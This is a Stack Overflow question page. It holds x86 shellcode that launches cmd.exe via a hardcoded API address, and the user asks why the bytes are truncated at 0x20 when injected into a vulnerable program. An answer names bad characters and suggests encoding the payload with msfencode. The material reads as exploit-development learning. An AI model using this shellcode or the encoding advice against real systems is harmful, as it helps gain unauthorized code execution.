Collectives™ on Stack Overflow
Find centralized, trusted content and collaborate around the technologies you use most.
Learn more about Collectives
Teams
Q&A for work
Connect and share knowledge within a single location that is structured and easy to search.
Learn more about Teams
Why is my shellcode is truncated after
\x20
opcode, when it is copied by string to stack on a second vulnerable program?
--cmd.exe--
char shell[]=
"\xc7\x44\x24\x0c\x65\x78\x65\x20" ← only this line is put in stack, though hv a enough space
"\xc7\x44\x24\x08\x63\x6d\x64\x2e"
"\x31\xc0"
"\x89\x44\x24\x04"
"\x8d\x44\x24\x08"
"\x89\x04\x24"
"\x8d\x05\xad\x23\x86\x7c"
"\xff\xd0";
--end shell--
–
–
My theory is that things like quote, space, null, etc are being interpreted by the windows shell rather than being sent through. You could escape it somehow, but I think it's easier to just encode the shellcode. So try metasploit's msfencode utility to avoid those opcodes altogether. I know null (/x00), space (/x20) and quote (/x22) can't be passed directly, but I suppose that there are other opcodes that can't be passed as well.
That's my solution, but does anyone know of any other ones that are better?
Thanks for contributing an answer to Stack Overflow!
-
Please be sure to
answer the question
. Provide details and share your research!
But
avoid
…
-
Asking for help, clarification, or responding to other answers.
-
Making statements based on opinion; back them up with references or personal experience.
To learn more, see our
tips on writing great answers
.
